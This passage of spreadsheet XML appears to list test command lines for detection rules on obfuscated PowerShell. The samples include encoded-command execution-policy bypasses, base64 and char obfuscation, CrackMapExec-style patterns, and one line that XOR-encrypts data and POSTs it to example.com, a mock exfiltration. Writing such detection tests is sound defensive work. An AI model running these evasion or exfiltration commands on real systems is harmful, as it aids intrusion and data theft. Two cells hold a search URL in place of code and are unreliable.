      </c>
      <c r="D91" s="36" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E91" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -exECUTIonPOLIcY Bypass -enc V3JpdGUtSDBzdCAiQnlwYXNzZWQi</t>
        </is>
      </c>
      <c r="F91" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G91" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H91" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I91" s="43" t="n"/>
      <c r="J91" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K91" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="92" ht="15.75" customHeight="1" s="42">
      <c r="A92" s="43" t="n"/>
      <c r="B92" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C92" s="36" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D92" s="36" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E92" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -enc V3JpdGUtSDBzdCAiQnlwYXNzZWQi</t>
        </is>
      </c>
      <c r="F92" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G92" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H92" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I92" s="43" t="n"/>
      <c r="J92" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K92" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="93" ht="15.75" customHeight="1" s="42">
      <c r="A93" s="43" t="n"/>
      <c r="B93" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C93" s="36" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D93" s="36" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E93" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExEcuTiOnPOLiCY Bypass /"EncodedCommand" V3JpdGUtSDBzdCAiQnlwYXNzZWQi</t>
        </is>
      </c>
      <c r="F93" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G93" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H93" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I93" s="43" t="n"/>
      <c r="J93" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K93" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="94" ht="15.75" customHeight="1" s="42">
      <c r="A94" s="43" t="n"/>
      <c r="B94" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C94" s="36" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D94" s="36" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E94" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass /"EncodedCommand" V3JpdGUtSDBzdCAiQnlwYXNzZWQi</t>
        </is>
      </c>
      <c r="F94" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G94" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H94" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I94" s="43" t="n"/>
      <c r="J94" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K94" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="95" ht="15.75" customHeight="1" s="42">
      <c r="A95" s="43" t="n"/>
      <c r="B95" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encoding_patterns</t>
        </is>
      </c>
      <c r="C95" s="36" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine</t>
        </is>
      </c>
      <c r="D95" s="36" t="inlineStr">
        <is>
          <t>cdf05894-89e7-4ead-b2b0-0a5f97a90f2f</t>
        </is>
      </c>
      <c r="E95" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -EncodeDcomMAND V3JpdGUtSDBzdCAiQnlwYXNzZWQi</t>
        </is>
      </c>
      <c r="F95" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G95" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H95" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I95" s="43" t="n"/>
      <c r="J95" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K95" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="96" ht="15.75" customHeight="1" s="42">
      <c r="A96" s="43" t="n"/>
      <c r="B96" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C96" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D96" s="36" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E96" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$method = 'FromBase' + '64String'; [Convert]::$method('SGVsbG8gV29ybGQ=')"</t>
        </is>
      </c>
      <c r="F96" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G96" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H96" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I96" s="43" t="n"/>
      <c r="J96" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K96" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="97" ht="15.75" customHeight="1" s="42">
      <c r="A97" s="43" t="n"/>
      <c r="B97" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C97" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D97" s="36" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E97" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$method = 'FromBase' + '64String'; [Convert]::$method('SGVsbG8gV29ybGQ=')"</t>
        </is>
      </c>
      <c r="F97" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G97" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H97" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I97" s="43" t="n"/>
      <c r="J97" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K97" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="98" ht="15.75" customHeight="1" s="42">
      <c r="A98" s="43" t="n"/>
      <c r="B98" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string</t>
        </is>
      </c>
      <c r="C98" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected</t>
        </is>
      </c>
      <c r="D98" s="36" t="inlineStr">
        <is>
          <t>e32d4572-9826-4738-b651-95fa63747e8a</t>
        </is>
      </c>
      <c r="E98" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAYQBsAGMALgBlAHgAZQA=</t>
        </is>
      </c>
      <c r="F98" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G98" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H98" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I98" s="36" t="n"/>
      <c r="J98" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K98" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="99" ht="15.75" customHeight="1" s="42">
      <c r="A99" s="43" t="n"/>
      <c r="B99" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C99" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D99" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E99" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Write-Host ([char] 0x41)"</t>
        </is>
      </c>
      <c r="F99" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G99" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H99" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I99" s="43" t="n"/>
      <c r="J99" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K99" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="100" ht="15.75" customHeight="1" s="42">
      <c r="A100" s="43" t="n"/>
      <c r="B100" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C100" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D100" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E100" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Write-Host ([char] 0x41)"</t>
        </is>
      </c>
      <c r="F100" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G100" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H100" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I100" s="43" t="n"/>
      <c r="J100" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K100" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="101" ht="15.75" customHeight="1" s="42">
      <c r="A101" s="43" t="n"/>
      <c r="B101" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C101" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D101" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E101" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Write-Host ([char]65 + [char]66)"</t>
        </is>
      </c>
      <c r="F101" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G101" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H101" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I101" s="43" t="n"/>
      <c r="J101" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K101" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="102" ht="15.75" customHeight="1" s="42">
      <c r="A102" s="43" t="n"/>
      <c r="B102" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C102" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D102" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E102" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Write-Host ([char]65 + [char]66)"</t>
        </is>
      </c>
      <c r="F102" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G102" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H102" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I102" s="43" t="n"/>
      <c r="J102" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K102" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="103" ht="15.75" customHeight="1" s="42">
      <c r="A103" s="43" t="n"/>
      <c r="B103" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C103" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D103" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E103" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Write-Host ([Convert]::ToChar(0x41))"</t>
        </is>
      </c>
      <c r="F103" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G103" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H103" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I103" s="43" t="n"/>
      <c r="J103" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K103" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="104" ht="15.75" customHeight="1" s="42">
      <c r="A104" s="43" t="n"/>
      <c r="B104" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C104" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D104" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E104" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Write-Host ([Convert]::ToChar(0x41))"</t>
        </is>
      </c>
      <c r="F104" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G104" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H104" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I104" s="43" t="n"/>
      <c r="J104" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K104" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="105" ht="15.75" customHeight="1" s="42">
      <c r="A105" s="43" t="n"/>
      <c r="B105" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C105" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D105" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E105" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Write-Host ([char]65)"</t>
        </is>
      </c>
      <c r="F105" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G105" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H105" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I105" s="43" t="n"/>
      <c r="J105" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K105" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="106" ht="15.75" customHeight="1" s="42">
      <c r="A106" s="43" t="n"/>
      <c r="B106" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C106" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D106" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E106" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Write-Host ([System.Char]0x41)"</t>
        </is>
      </c>
      <c r="F106" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G106" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H106" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I106" s="43" t="n"/>
      <c r="J106" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K106" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="107" ht="15.75" customHeight="1" s="42">
      <c r="A107" s="43" t="n"/>
      <c r="B107" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C107" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D107" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E107" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Write-Host ([System.Char]0x41)"</t>
        </is>
      </c>
      <c r="F107" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G107" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H107" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I107" s="43" t="n"/>
      <c r="J107" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K107" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="108" ht="15.75" customHeight="1" s="42">
      <c r="A108" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B108" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_xor_commandline</t>
        </is>
      </c>
      <c r="C108" s="36" t="inlineStr">
        <is>
          <t>Suspicious XOR Encoded PowerShell Command</t>
        </is>
      </c>
      <c r="D108" s="36" t="inlineStr">
        <is>
          <t>bb780e0c-16cf-4383-8383-1e5471db6cf9</t>
        </is>
      </c>
      <c r="E108" s="36" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {$plaintext = ([system.Text.Encoding]::UTF8.getBytes("Path\n----\nC:\Users\victim"))
$key = "abcdefghijklmnopqrstuvwxyz123456"
$cyphertext =  @();
$i = 0; while ($i -lt $plaintext.Count) {
 $cyphertext += $plaintext[$i] -bxor $key[$i % $key.Length];
 $i++;
}
$cyphertext = [system.Text.Encoding]::UTF8.getString($cyphertext)
Invoke-WebRequest -Uri example.com -Method POST -Body $cyphertext}</t>
        </is>
      </c>
      <c r="F108" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G108" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H108" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I108" s="43" t="n"/>
      <c r="J108" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K108" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="109" ht="15.75" customHeight="1" s="42">
      <c r="A109" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B109" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_xor_commandline</t>
        </is>
      </c>
      <c r="C109" s="36" t="inlineStr">
        <is>
          <t>Suspicious XOR Encoded PowerShell Command</t>
        </is>
      </c>
      <c r="D109" s="36" t="inlineStr">
        <is>
          <t>bb780e0c-16cf-4383-8383-1e5471db6cf9</t>
        </is>
      </c>
      <c r="E109" s="36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F109" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G109" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H109" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I109" s="43" t="n"/>
      <c r="J109" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K109" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="110" ht="15.75" customHeight="1" s="42">
      <c r="A110" s="43" t="n"/>
      <c r="B110" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_cli_obfuscation_unicode_img</t>
        </is>
      </c>
      <c r="C110" s="36" t="inlineStr">
        <is>
          <t>Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image</t>
        </is>
      </c>
      <c r="D110" s="36" t="inlineStr">
        <is>
          <t>584bca0f-3608-4402-80fd-4075ff6072e3</t>
        </is>
      </c>
      <c r="E110" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C "w^h^o^a^m^i"</t>
        </is>
      </c>
      <c r="F110" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G110" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H110" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I110" s="36" t="n"/>
      <c r="J110" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K110" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="111" ht="15.75" customHeight="1" s="42">
      <c r="A111" s="36" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B111" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C111" s="36" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D111" s="36" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E111" s="36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F111" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G111" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H111" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I111" s="43" t="n"/>
      <c r="J111" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K111" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="112" ht="15.75" customHeight="1" s="42">
      <c r="A112" s="36" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B112" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C112" s="36" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D112" s="36" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E112" s="36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112" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G112" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H112" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I112" s="43" t="n"/>
      <c r="J112" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K112" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="113" ht="15.75" customHeight="1" s="42">
      <c r="A113" s="36" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B113" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C113" s="36" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D113" s="36" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E113" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand JABzID0gJ2pvaW4nOyAkcyArPSAnc3BsaXQnOyBXcml0ZS1Ib3N0ICRz</t>
        </is>
      </c>
      <c r="F113" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G113" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H113" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I113" s="43" t="n"/>
      <c r="J113" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K113" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="114" ht="15.75" customHeight="1" s="42">
      <c r="A114" s="36" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B114" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C114" s="36" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D114" s="36" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E114" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eNCoDEdcomMAnD JABzID0gJ2pvaW4nOyAkcyArPSAnc3BsaXQnOyBXcml0ZS1Ib3N0ICRz</t>
        </is>
      </c>
      <c r="F114" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G114" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H114" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I114" s="36" t="n"/>
      <c r="J114" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K114" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="115" ht="15.75" customHeight="1" s="42">
      <c r="A115" s="36" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B115" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C115" s="36" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D115" s="36" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E115" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" JABzID0gJ2pvaW4nOyAkcyArPSAnc3BsaXQnOyBXcml0ZS1Ib3N0ICRz</t>
        </is>
      </c>
      <c r="F115" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G115" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H115" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I115" s="43" t="n"/>
      <c r="J115" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K115" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="116" ht="15.75" customHeight="1" s="42">
      <c r="A116" s="36" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B116" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C116" s="36" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D116" s="36" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E116" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -EncOdEdcoMManD JABzID0gJ2pvaW4nOyAkcyArPSAnc3BsaXQnOyBXcml0ZS1Ib3N0ICRz</t>
        </is>
      </c>
      <c r="F116" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G116" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H116" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I116" s="43" t="n"/>
      <c r="J116" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K116" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="117" ht="15.75" customHeight="1" s="42">
      <c r="A117" s="36" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B117" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C117" s="36" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D117" s="36" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E117" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -EncoDEDcommaND JABzID0gJ2pvaW4nOyAkcyArPSAnc3BsaXQnOyBXcml0ZS1Ib3N0ICRz</t>
        </is>
      </c>
      <c r="F117" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G117" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H117" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I117" s="36" t="n"/>
      <c r="J117" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K117" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="118" ht="15.75" customHeight="1" s="42">
      <c r="A118" s="36" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B118" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C118" s="36" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D118" s="36" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E118" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[char[]](https://www.google.com/search?q=106,111,105,110) -join ''"</t>
        </is>
      </c>
      <c r="F118" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G118" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H118" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I118" s="36" t="n"/>
      <c r="J118" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K118" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="119" ht="15.75" customHeight="1" s="42">
      <c r="A119" s="36" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B119" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C119" s="36" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D119" s="36" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E119" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "[char[]](https://www.google.com/search?q=106,111,105,110) -join ''"</t>
        </is>
      </c>
